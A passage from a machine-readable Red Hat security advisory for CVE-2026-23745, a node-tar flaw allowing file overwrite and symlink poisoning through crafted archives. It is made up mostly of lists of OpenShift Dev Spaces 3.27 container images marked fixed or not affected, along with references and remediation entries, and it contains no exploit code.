"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2430538"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the node-tar library. This vulnerability allows an attacker to craft malicious archives that, when extracted, can bypass intended security restrictions. This leads to arbitrary file overwrite and symlink poisoning, potentially allowing unauthorized modification of files on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat products that utilize the node-tar library. The flaw allows an attacker to perform arbitrary file overwrite and symlink poisoning by crafting malicious tar archives. This occurs due to insufficient path sanitization of hardlink and symbolic link entries, even when the default secure behavior (preservePaths is false) is enabled.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23745"
},
{
"category": "external",
"summary": "RHBZ#2430538",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430538"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23745",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23745"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e",
"url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97"
}
],
"release_date": "2026-01-16T22:00:08.769000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
